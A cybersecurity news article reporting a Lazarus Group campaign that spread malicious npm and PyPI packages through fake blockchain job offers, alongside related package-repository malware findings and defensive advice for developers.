North Korea-linked Lazarus Group is targeting developers with malicious npm and PyPI packages through fake blockchain job offers, deploying remote access trojans to steal cryptocurrency wallets and sensitive data.
Cybersecurity researchers have uncovered a sophisticated campaign by the North Korea-linked Lazarus Group that planted over 30 malicious packages across npm and PyPI repositories. Dubbed "graphalgo" after its initial npm package, this operation leverages fake blockchain job offers to trick developers into installing malware-laden dependencies.
Recruitment as Attack Vector
According to ReversingLabs researcher Karlo Zanki, attackers approach developers through LinkedIn, Facebook, and job forums like Reddit: "Developers are approached via social platforms... with a well-orchestrated story around a company involved in blockchain and cryptocurrency exchanges." The threat actors establish fake companies like Veltrix Capital, complete with professional-looking domains and GitHub organizations hosting seemingly legitimate coding assessment repositories.
The malicious packages—including bigmathutils (npm) and bigmathix (PyPI)—contain hidden payloads that activate when developers run coding tests. One npm package attracted over 10,000 downloads before its malicious version was deployed. When executed, these packages deploy a remote access trojan (RAT) that:
- Gathers system information and file directories
- Steals cryptocurrency wallet data (including MetaMask extensions)
- Exfiltrates credentials via encrypted C2 channels
- Supports file manipulation commands (upload/download/delete)
Sophisticated Tradecraft
Notably, the RAT uses a token-based authentication system previously seen in Jade Sleet campaigns. As Zanki explained: "The token-based approach... has not been used by other actors in malware hosted on public package repositories." Infected systems first register with the C2 server, receiving a token that must accompany all subsequent communications—a technique that filters out security researchers' probes.
This campaign demonstrates exceptional patience, with attackers spending months building fake company profiles and relationships before deploying malicious payloads. ReversingLabs notes: "Its modularity, long-lived nature, and complexity of the multilayered malware point to a state-sponsored threat actor."
Broader Ecosystem Threats
Simultaneously, JFrog discovered duer-js—a malicious npm package posing as a console utility that actually distributes Bada Stealer. This Windows malware harvests:
- Discord tokens and browser passwords
- Cryptocurrency wallet data
- Payment methods via Discord client hijacking
Another campaign dubbed XPACK ATTACK abuses npm's installation process to extort payments. As OpenSourceMalware researcher Paul McCarty detailed: "The attack blocks installation until victims pay 0.1 USDC/ETH... while collecting GitHub usernames and device fingerprints." It exploits HTTP status code 402 ("Payment Required") to create fake paywalls.
Protection Strategies
For developers and organizations:
- Verify job offers: Research companies offering coding tests, especially in blockchain/crypto sectors
- Audit dependencies: Use tools like
npm auditand PyPI's security features before installation - Sandbox assessments: Run coding tests in isolated environments
- Monitor network traffic: Detect anomalous connections to unknown C2 servers
- Implement supply chain security: Use SCA tools to flag suspicious package behavior
These incidents highlight how open-source ecosystems remain prime targets for advanced threat actors. As Zanki warns: "Developers must treat unsolicited job offers requiring code execution as potential attack vectors."
Relevant Resources:
Comments
Please log in or register to join the discussion